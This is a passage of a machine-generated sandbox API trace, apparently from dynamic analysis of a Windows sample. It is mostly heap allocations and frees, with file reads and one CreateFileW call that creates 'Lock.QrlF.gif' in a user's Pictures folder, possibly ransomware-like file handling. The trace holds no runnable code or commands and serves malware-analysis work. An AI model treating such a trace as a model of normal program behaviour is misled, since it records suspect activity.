Flags=0x0, Size=0x8) returned 0x24b1908 [0256.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0256.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.299] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0256.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0256.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0256.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Lock.QrlF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lock.qrlf.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0256.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0256.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0256.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0256.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0256.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0256.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0256.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0256.303] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0256.303] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0256.305] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x8374, lpOverlapped=0x0) returned 1 [0256.306] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0256.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18374) returned 0x24c7a50 [0256.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0256.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0256.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0256.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18374) returned 0x34b2250 [0256.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0256.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.309] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0256.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18374) returned 0x24c7a50 [0256.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0256.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.310] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0256.311] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0256.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0256.311] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0256.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0256.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0256.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0256.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18374) returned 0x24c7a50 [0256.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2658 [0256.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0256.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0256.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0256.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0256.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18374) returned 0x34ca5d0 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0256.314] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0256.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0256.315] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0256.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.315] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.316] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0256.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0256.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.316] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0256.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0256.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0256.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0256.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 